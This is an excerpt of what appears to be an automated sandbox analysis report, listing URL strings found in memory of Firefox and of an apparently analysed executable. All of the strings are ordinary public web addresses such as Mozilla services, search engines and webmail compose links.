Source: firefox.exe, 00000034.00000002.2913294398.000001EB31543000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000034.00000002.2918653771.000001EB32B46000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000034.00000002.2981779926.000018DAC0004000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://duckduckgo.com
Source: firefox.exe, 00000034.00000002.2934876567.000001EB3693A000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000034.00000003.2790868435.000001EB35A7B000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://duckduckgo.com/
Source: firefox.exe, 00000034.00000002.2934876567.000001EB3693A000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://duckduckgo.com/?t=ffab&q=
Source: 847ee125a0.exe, 00000024.00000003.2628463092.000000000551F000.00000004.00000800.00020000.00000000.sdmp, 847ee125a0.exe, 00000024.00000003.2628581743.0000000005508000.00000004.00000800.00020000.00000000.sdmp, 847ee125a0.exe, 00000027.00000003.2789722897.00000000056C8000.00000004.00000800.00020000.00000000.sdmp, 847ee125a0.exe, 00000027.00000003.2789358745.00000000056DF000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://duckduckgo.com/ac/?q=
Source: 847ee125a0.exe, 00000024.00000003.2628463092.000000000551F000.00000004.00000800.00020000.00000000.sdmp, 847ee125a0.exe, 00000024.00000003.2628581743.0000000005508000.00000004.00000800.00020000.00000000.sdmp, 847ee125a0.exe, 00000027.00000003.2789722897.00000000056C8000.00000004.00000800.00020000.00000000.sdmp, 847ee125a0.exe, 00000027.00000003.2789358745.00000000056DF000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://duckduckgo.com/chrome_newtab
Source: 847ee125a0.exe, 00000024.00000003.2628463092.000000000551F000.00000004.00000800.00020000.00000000.sdmp, 847ee125a0.exe, 00000024.00000003.2628581743.0000000005508000.00000004.00000800.00020000.00000000.sdmp, 847ee125a0.exe, 00000027.00000003.2789722897.00000000056C8000.00000004.00000800.00020000.00000000.sdmp, 847ee125a0.exe, 00000027.00000003.2789358745.00000000056DF000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://duckduckgo.com/favicon.icohttps://duckduckgo.com/?q=
Source: firefox.exe, 00000034.00000002.2941979451.000001EB37617000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://duckduckgo.com/y
Source: firefox.exe, 00000034.00000002.2926960032.000001EB35639000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000034.00000003.2796421015.000001EB35633000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000034.00000002.2925034988.000001EB33DD5000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000034.00000002.2917539467.000001EB31F72000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000034.00000003.2792752744.000001EB35633000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000034.00000002.2916350174.000001EB31B7D000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://e.mail.ru/cgi-bin/sentmsg?mailto=%s
Source: firefox.exe, 00000034.00000002.2925034988.000001EB33DD5000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://e.mail.ru/cgi-bin/sentmsg?mailto=%sz
Source: firefox.exe, 00000034.00000002.2925034988.000001EB33DD5000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://e.mail.ru/cgi-bin/sentmsg?mailto=%szw
Source: firefox.exe, 00000034.00000002.2982623345.00001A26C8E04000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://ebay.comP
Source: firefox.exe, 00000034.00000002.2926960032.000001EB35639000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000034.00000003.2796421015.000001EB35633000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000034.00000002.2925034988.000001EB33DD5000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000034.00000002.2917539467.000001EB31F72000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000034.00000003.2792752744.000001EB35633000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://email.seznam.cz/newMessageScreen?mailto=%s
Source: firefox.exe, 00000034.00000002.2917539467.000001EB31F72000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://email.seznam.cz/newMessageScreen?mailto=%shttps://outlook.live.com/default.aspx?rru=compose&
Source: firefox.exe, 00000034.00000002.2916919570.000001EB31E2C000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000034.00000002.2916919570.000001EB31E11000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://extensionworkshop.com/documentation/publish/self-distribution/
Source: firefox.exe, 00000034.00000002.2913294398.000001EB31543000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000034.00000002.2957862215.000001EB3959E000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000034.00000002.2972531378.000001EB4011F000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000034.00000002.2918653771.000001EB32B03000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000034.00000002.2941979451.000001EB37617000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000034.00000002.2917539467.000001EB31FDF000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://firefox-api-proxy.cdn.mozilla.net/
Source: firefox.exe, 00000034.00000003.2853488490.000001EB36B76000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000034.00000002.2941979451.000001EB37617000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000034.00000003.2854343934.000001EB36BA7000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://firefox-settings-attachments.cdn.mozilla.net/main-workspace/ms-images/706c7a85-cf23-442e-8a9
Source: firefox.exe, 00000034.00000002.2923800045.000001EB33570000.00000002.08000000.00040000.00000000.sdmp String found in binary or memory: https://firefox-source-docs.mozilla.org/networking/dns/trr-skip-reasons.html#
Source: firefox.exe, 00000034.00000002.2916919570.000001EB31E11000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://firefox-source-docs.mozilla.org/performance/scroll-linked_effects.html
Source: firefox.exe, 00000034.00000002.2917539467.000001EB31F26000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://firefox-source-docs.mozilla.org/remote/Security.html
Source: firefox.exe, 00000034.00000002.2917539467.000001EB31F72000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://firefox.settings.services.allizom.org/v1/buckets/main-preview/collections/search-config/reco
Source: firefox.exe, 00000034.00000002.2917539467.000001EB31F72000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://firefox.settings.services.mozilla.com/v1/buckets/main-preview/collections/search-config/reco
Source: firefox.exe, 00000034.00000002.2917539467.000001EB31F72000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://firefox.settings.services.mozilla.com/v1/buckets/main/collections/search-config/records
Source: firefox.exe, 00000034.00000002.2917539467.000001EB31F03000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://firefox.settings.services.mozilla.com/v1Connecting
Source: firefox.exe, 00000034.00000002.2918653771.000001EB32B46000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000034.00000002.2916919570.000001EB31E08000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000034.00000002.2983612498.0000210E81F04000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://fpn.firefox.com
Source: firefox.exe, 00000034.00000002.2923800045.000001EB33570000.00000002.08000000.00040000.00000000.sdmp String found in binary or memory: https://fpn.firefox.com/browser?utm_source=firefox-desktop&utm_medium=referral&utm_campaign=about-pr
Source: firefox.exe, 00000034.00000002.2923800045.000001EB33570000.00000002.08000000.00040000.00000000.sdmp String found in binary or memory: https://ftp.mozilla.org/pub/labs/devtools/adb-extension/#OS#/adb-extension-latest-#OS#.xpi
Source: firefox.exe, 00000034.00000002.2913294398.000001EB31543000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000034.00000002.2957862215.000001EB3959E000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000034.00000002.2972531378.000001EB4011F000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000034.00000002.2918653771.000001EB32B03000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000034.00000002.2941979451.000001EB37617000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000034.00000002.2917539467.000001EB31FDF000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://getpocket.cdn.mozilla.net/
Source: firefox.exe, 00000034.00000002.2918653771.000001EB32B03000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000034.00000002.2947037624.000001EB37FD1000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000034.00000002.2917539467.000001EB31FDF000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://getpocket.cdn.mozilla.net/v3/firefox/global-recs?version=3&consumer_key=$apiKey&locale_lang=
Source: firefox.exe, 00000034.00000002.2918653771.000001EB32B03000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000034.00000002.2941979451.000001EB37617000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000034.00000002.2947037624.000001EB37FD1000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000034.00000002.2917539467.000001EB31FDF000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://getpocket.cdn.mozilla.net/v3/firefox/trending-topics?version=2&consumer_key=$apiKey&locale_l
Source: firefox.exe, 00000034.00000002.2917539467.000001EB31F03000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000034.00000002.2941979451.000001EB37617000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000034.00000002.2917539467.000001EB31FDF000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://getpocket.cdn.mozilla.net/v3/newtab/layout?version=1&consumer_key=$apiKey&layout_variant=bas
Source: firefox.exe, 00000034.00000002.2913294398.000001EB31543000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000034.00000002.2918653771.000001EB32B03000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://getpocket.cdn.mozilla.net/v3/newtab/layout?version=1&consumer_key=40249-e88c401e1b1f2242d9e4
Source: firefox.exe, 00000034.00000002.2913294398.000001EB31543000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000034.00000002.2918653771.000001EB32B03000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000034.00000002.2941979451.000001EB37617000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://getpocket.com/explore/career?utm_source=pocket-newtab
Source: firefox.exe, 00000034.00000002.2913294398.000001EB31543000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000034.00000002.2918653771.000001EB32B03000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000034.00000002.2941979451.000001EB37617000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://getpocket.com/explore/entertainment?utm_source=pocket-newtab
Source: firefox.exe, 00000034.00000002.2913294398.000001EB31543000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000034.00000002.2918653771.000001EB32B03000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000034.00000002.2941979451.000001EB37617000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://getpocket.com/explore/food?utm_source=pocket-newtab
Source: firefox.exe, 00000034.00000002.2913294398.000001EB31543000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000034.00000002.2918653771.000001EB32B03000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000034.00000002.2941979451.000001EB37617000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://getpocket.com/explore/health?utm_source=pocket-newtab
Source: firefox.exe, 00000034.00000002.2913294398.000001EB31543000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000034.00000002.2918653771.000001EB32B03000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000034.00000002.2941979451.000001EB37617000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://getpocket.com/explore/science?utm_source=pocket-newtab
Source: firefox.exe, 00000034.00000002.2913294398.000001EB31543000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000034.00000002.2918653771.000001EB32B03000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000034.00000002.2941979451.000001EB37617000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://getpocket.com/explore/self-improvement?utm_source=pocket-newtab
Source: firefox.exe, 00000034.00000002.2913294398.000001EB31543000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000034.00000002.2918653771.000001EB32B03000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000034.00000002.2941979451.000001EB37617000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://getpocket.com/explore/technology?utm_source=pocket-newtab
Source: firefox.exe, 00000034.00000002.2918653771.000001EB32B03000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000034.00000002.2941979451.000001EB37617000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000034.00000002.2947037624.000001EB37FD1000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000034.00000002.2917539467.000001EB31FDF000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://getpocket.com/explore/trending?src=fx_new_tab
Source: firefox.exe, 00000034.00000002.2957862215.000001EB3959E000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://getpocket.com/explore/trending?src=fx_new_tabL
Source: firefox.exe, 00000034.00000002.2913294398.000001EB31543000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000034.00000002.2918653771.000001EB32B03000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000034.00000002.2941979451.000001EB37617000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://getpocket.com/explore?utm_source=pocket-newtab
Source: firefox.exe, 00000034.00000002.2965979540.000001EB3DC90000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://getpocket.com/firefox/new_tab_learn_more
Source: firefox.exe, 00000034.00000002.2941979451.000001EB37617000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://getpocket.com/firefox/new_tab_learn_moreNetworkError
Source: firefox.exe, 00000034.00000002.2918653771.000001EB32B03000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000034.00000002.2941979451.000001EB37617000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000034.00000002.2947037624.000001EB37FD1000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000034.00000002.2917539467.000001EB31FDF000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://getpocket.com/recommendations
Source: firefox.exe, 00000034.00000002.2957862215.000001EB3959E000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://getpocket.com/recommendationsS
Source: firefox.exe, 00000034.00000002.2957862215.000001EB3959E000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://getpocket.com/recommendationsS7
Source: firefox.exe, 00000034.00000002.2917539467.000001EB31F03000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://getpocket.com/v3/newtab/layout?version=1&consumer_key=$apiKey&layout_variant=basic
Source: firefox.exe, 00000034.00000002.2921700638.000001EB32E03000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://github.com/
Source: firefox.exe, 00000034.00000002.2928082132.000001EB35895000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000034.00000002.2941979451.000001EB37617000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://github.com/cfworker
Source: firefox.exe, 00000034.00000002.2964775927.000001EB3DB3E000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://github.com/google/closure-compiler/issues/3177
Source: firefox.exe, 00000034.00000002.2964775927.000001EB3DB1F000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://github.com/lit/lit/blob/main/packages/reactive-element/src/decorators/query-all.ts
Source: firefox.exe, 00000034.00000002.2964775927.000001EB3DB1F000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://github.com/lit/lit/blob/main/packages/reactive-element/src/decorators/query.ts
Source: firefox.exe, 00000034.00000002.2964775927.000001EB3DB3E000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://github.com/lit/lit/issues/1266
Source: firefox.exe, 00000034.00000002.2964775927.000001EB3DB3E000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://github.com/microsoft/TypeScript/issues/338).
Source: firefox.exe, 00000034.00000003.2789388938.000001EB35800000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000034.00000003.2789758825.000001EB35A20000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000034.00000003.2790551319.000001EB35A5D000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000034.00000002.2917539467.000001EB31F72000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000034.00000002.2941979451.000001EB37617000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000034.00000003.2790868435.000001EB35A7B000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://github.com/mozilla-services/screenshots
Source: firefox.exe, 00000034.00000002.2917539467.000001EB31F72000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://github.com/mozilla-services/screenshotsshims/google-analytics-ecommerce-plugin.jsasyncEmitMa
Source: firefox.exe, 00000034.00000002.2957862215.000001EB3959E000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000034.00000002.2941979451.000001EB37617000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://github.com/w3c/csswg-drafts/blob/master/css-grid-2/MASONRY-EXPLAINER.md
Source: firefox.exe, 00000034.00000002.2957862215.000001EB3959E000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000034.00000002.2941979451.000001EB37617000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://github.com/w3c/csswg-drafts/issues/4650
Source: firefox.exe, 00000034.00000002.2917539467.000001EB31F26000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://github.com/zertosh/loose-envify)
Source: firefox.exe, 00000034.00000002.2913294398.000001EB31543000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000034.00000002.2918653771.000001EB32B46000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000034.00000002.2981779926.000018DAC0004000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://google.com
Source: firefox.exe, 00000034.00000002.2933325693.000001EB36503000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://google.com/
Source: firefox.exe, 00000034.00000002.2957862215.000001EB3959E000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://gpuweb.github.io/gpuweb/
Source: firefox.exe, 00000034.00000002.2923800045.000001EB33570000.00000002.08000000.00040000.00000000.sdmp String found in binary or memory: https://helper1.dap.cloudflareresearch.com/v02
Source: firefox.exe, 00000034.00000002.2910860360.000001EB25D11000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000034.00000002.2917539467.000001EB31F03000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://hg.mozilla.org/releases/mozilla-release/rev/68e4c357d26c5a1f075a1ec0c696d4fe684ed881
Source: firefox.exe, 00000034.00000002.2917539467.000001EB31F03000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://hg.mozilla.org/releases/mozilla-release/rev/68e4c357d26c5a1f075a1ec0c696d4fe684ed881jar:file
Source: firefox.exe, 00000034.00000002.2923800045.000001EB33570000.00000002.08000000.00040000.00000000.sdmp String found in binary or memory: https://ideas.mozilla.org/
Source: firefox.exe, 00000034.00000002.2940906463.000001EB37064000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000034.00000002.2941979451.000001EB37617000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://identity.mozilla.com/apps/relay
Source: firefox.exe, 00000034.00000002.2941979451.000001EB37617000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://img-getpocket.cdn.mozilla.net/
Source: firefox.exe, 00000034.00000002.2918653771.000001EB32B46000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://imp.mt48.net/static?id=7RHzfOIXjFEYsBdvIpkX4QqmfZfYfQfafZbXfpbWfpbX7ReNxR3UIG8zInwYIFIVs9eYi
Source: firefox.exe, 00000034.00000002.2914139986.000001EB316E7000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://incoming.telemetry.mozilla.org
Source: firefox.exe, 00000034.00000002.2913294398.000001EB31543000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000034.00000002.2918653771.000001EB32B03000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000034.00000002.2941979451.000001EB37617000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000034.00000002.2963602113.000001EB3DA53000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://incoming.telemetry.mozilla.org/submit
Source: firefox.exe, 00000034.00000002.2957862215.000001EB3959E000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://incoming.telemetry.mozilla.org/submits
Source: firefox.exe, 00000034.00000002.2964775927.000001EB3DB3E000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://infra.spec.whatwg.org/#ascii-whitespace
Source: firefox.exe, 00000034.00000002.2923800045.000001EB33570000.00000002.08000000.00040000.00000000.sdmp String found in binary or memory: https://install.mozilla.org
Source: firefox.exe, 00000034.00000002.2948502881.000001EB381B3000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000034.00000003.2853000177.000001EB37666000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000034.00000002.2941979451.000001EB37617000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://json-schema.org/draft/2019-09/schema
Source: firefox.exe, 00000034.00000002.2964775927.000001EB3DB3E000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://lit.dev/docs/libraries/standalone-templates/#rendering-lit-html-templates
Source: firefox.exe, 00000034.00000002.2964775927.000001EB3DB3E000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://lit.dev/docs/templates/directives/#stylemap
Source: firefox.exe, 00000034.00000002.2964775927.000001EB3DB3E000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://lit.dev/docs/templates/expressions/#child-expressions)
Source: firefox.exe, 00000034.00000002.2918653771.000001EB32B46000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000034.00000002.2943876866.000001EB37903000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://location.services.mozilla.com
Source: firefox.exe, 00000034.00000002.2923800045.000001EB33570000.00000002.08000000.00040000.00000000.sdmp String found in binary or memory: https://location.services.mozilla.com/v1/country?key=%MOZILLA_API_KEY%
Source: firefox.exe, 00000034.00000002.2934876567.000001EB36920000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000034.00000002.2942571768.000001EB378EF000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000034.00000002.2932523071.000001EB3646B000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000034.00000003.2852260978.000001EB3692C000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000034.00000002.2943876866.000001EB37903000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://location.services.mozilla.com/v1/country?key=7e40f68c-7938-4c5d-9f95-e61647c213eb
Source: firefox.exe, 00000034.00000002.2936416759.000001EB36B2F000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://login.li
Source: firefox.exe, 00000034.00000002.2953557870.000001EB39184000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000034.00000002.2941979451.000001EB37617000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000034.00000002.2984219915.0000270DAFC19000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://login.live.com
Source: firefox.exe, 00000034.00000002.2953557870.000001EB39184000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000034.00000002.2952134810.000001EB38715000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000034.00000002.2941979451.000001EB37617000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://login.microsoftonline.com
Source: firefox.exe, 00000034.00000002.2941979451.000001EB37617000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://login.microsoftonline.com08a40f72-8958-46f3-8b0d-9bdc1571b553pref-webrender-intel-rollout-70
Source: firefox.exe, 00000034.00000002.2917539467.000001EB31F72000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000034.00000003.2792752744.000001EB35633000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://mail.google.com/mail/?extsrc=mailto&url=%s
Source: firefox.exe, 00000034.00000002.2917539467.000001EB31F72000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://mail.google.com/mail/?extsrc=mailto&url=%sPdfJs.init
Source: firefox.exe, 00000034.00000002.2926960032.000001EB35639000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000034.00000003.2796421015.000001EB35633000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000034.00000002.2925034988.000001EB33DD5000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000034.00000002.2917539467.000001EB31F72000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000034.00000003.2792752744.000001EB35633000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000034.00000002.2916350174.000001EB31B7D000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://mail.inbox.lv/compose?to=%s
Source: firefox.exe, 00000034.00000002.2925034988.000001EB33DD5000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://mail.inbox.lv/compose?to=%sv
Source: firefox.exe, 00000034.00000002.2917539467.000001EB31F72000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000034.00000003.2792752744.000001EB35633000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000034.00000002.2916350174.000001EB31B7D000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://mail.yahoo.co.jp/compose/?To=%s
Source: firefox.exe, 00000034.00000002.2917539467.000001EB31F72000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://mail.yahoo.co.jp/compose/?To=%sresource://gre/modules/JSONFile.sys.mjs_injectDefaultProtocol
Source: firefox.exe, 00000034.00000002.2925034988.000001EB33DD5000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://mail.yahoo.co.jp/compose/?To=%st
Source: firefox.exe, 00000034.00000002.2941979451.000001EB37617000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000034.00000002.2910860360.000001EB25DD8000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000034.00000002.2917539467.000001EB31FDF000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://merino.services.mozilla.com/api/v1/suggest
Source: firefox.exe, 00000034.00000002.2941979451.000001EB37617000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://merino.services.mozilla.com/api/v1/suggestbug-1732206-rollout-fission-release-rollout-releas
Source: firefox.exe, 00000034.00000002.2923800045.000001EB33570000.00000002.08000000.00040000.00000000.sdmp String found in binary or memory: https://mitmdetection.services.mozilla.com/
Source: firefox.exe, 00000034.00000002.2914139986.000001EB316A7000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000034.00000002.2917539467.000001EB31F03000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000034.00000002.2925034988.000001EB33D3D000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://monitor.firefox.com
Source: firefox.exe, 00000034.00000002.2923800045.000001EB33570000.00000002.08000000.00040000.00000000.sdmp String found in binary or memory: https://monitor.firefox.com/?entrypoint=protection_report_monitor&utm_source=about-protections
Source: firefox.exe, 00000034.00000002.2923800045.000001EB33570000.00000002.08000000.00040000.00000000.sdmp String found in binary or memory: https://monitor.firefox.com/about
Source: firefox.exe, 00000034.00000002.2923800045.000001EB33570000.00000002.08000000.00040000.00000000.sdmp String found in binary or memory: https://monitor.firefox.com/breach-details/
Source: firefox.exe, 00000034.00000002.2923800045.000001EB33570000.00000002.08000000.00040000.00000000.sdmp String found in binary or memory: https://monitor.firefox.com/oauth/init?entrypoint=protection_report_monitor&utm_source=about-protect
Source: firefox.exe, 00000034.00000002.2923800045.000001EB33570000.00000002.08000000.00040000.00000000.sdmp String found in binary or memory: https://monitor.firefox.com/user/breach-stats?includeResolved=true
Source: firefox.exe, 00000034.00000002.2923800045.000001EB33570000.00000002.08000000.00040000.00000000.sdmp String found in binary or memory: https://monitor.firefox.com/user/dashboard
Source: firefox.exe, 00000034.00000002.2923800045.000001EB33570000.00000002.08000000.00040000.00000000.sdmp String found in binary or memory: https://monitor.firefox.com/user/preferences
Source: firefox.exe, 00000034.00000002.2917539467.000001EB31F03000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://mozilla-hub.atlassian.net/browse/SDK-405
Source: firefox.exe, 00000034.00000002.2923800045.000001EB33570000.00000002.08000000.00040000.00000000.sdmp String found in binary or memory: https://mozilla-ohttp-fakespot.fastly-edge.com/
Source: firefox.exe, 00000034.00000002.2923800045.000001EB33570000.00000002.08000000.00040000.00000000.sdmp String found in binary or memory: https://mozilla.cloudflare-dns.com/dns-query
Source: firefox.exe, 00000034.00000002.2917539467.000001EB31F03000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://mzl.la/3NS9KJd
Source: firefox.exe, 00000034.00000002.2923800045.000001EB33570000.00000002.08000000.00040000.00000000.sdmp String found in binary or memory: https://normandy.cdn.mozilla.net/api/v1
